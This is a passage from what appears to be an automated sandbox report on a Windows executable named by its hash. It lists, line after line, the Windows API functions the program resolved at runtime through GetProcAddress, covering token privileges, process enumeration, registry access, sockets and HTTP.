(UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessIdW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValue (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValueW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter OpenProcessTokenW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivilegesW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter OpenProcessW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter EnumProcessModules (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter EnumProcessModulesW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetModuleInformation (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetModuleInformationW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseName (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseNameW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameEx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameExW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetTempPath (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetTempPathW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleName (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetUserPreferredUILanguages (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyEx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetFullPathName (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CryptGetDefaultProviderW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetStdHandle (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CreateEvent (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CreateEventW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SortGetHandle (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SortCloseHandle (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RegQueryValueEx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CompareStringOrdinal (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformation (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesEx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SetThreadErrorMode (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CreateFile (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap_RetAddr (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter BCryptGetFipsAlgorithmMode (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetDynamicTimeZoneInformation (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPath (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetFileMUIPath (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter LoadLibraryEx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter FreeLibraryW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetNetworkParams (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter NtQueryInformationThread (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CreateWaitableTimerExW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SetWaitableTimerEx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceFrequency (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RasEnumConnections (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RasEnumConnectionsW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter WSASocket (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter WSASocketW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter setsockopt (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter WSAEventSelect (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter ioctlsocket (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter closesocket (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter FormatMessage (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter FormatMessageW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RasConnectionNotification (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RasConnectionNotificationW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter TraceRegisterExA (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter TracePrintfExA (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerA (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter OpenServiceA (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter NotifyServiceStatusChangeA (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RegOpenCurrentUser (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RegNotifyChangeKeyValue (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter WinHttpOpen (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter WinHttpOpenW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter WinHttpCloseHandle (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter WinHttpCloseHandleW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter StrRChrA (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetProductInfo (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter InitSecurityInterfaceW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter InitSecurityInterfaceA (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetAuthInfoExW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetOption (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RpcStringFreeW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter WinHttpSetTimeouts (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter WinHttpSetTimeoutsW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter WinHttpGetIEProxyConfigForCurrentUser (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RtlConvertSidToUnicodeString (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeA (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter NsiAllocateAndGetTable (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CM_Open_Class_Key_ExW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter NsiFreeTable (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariable (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CreateDirectory (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CreateDirectoryW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SetFileAttributes (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter ShellExecuteEx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter HeapSetInformation (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GrooveChainGetGlobalInterfacePtrAddress (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GrooveChainCoCreateInstance (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00003276)\n 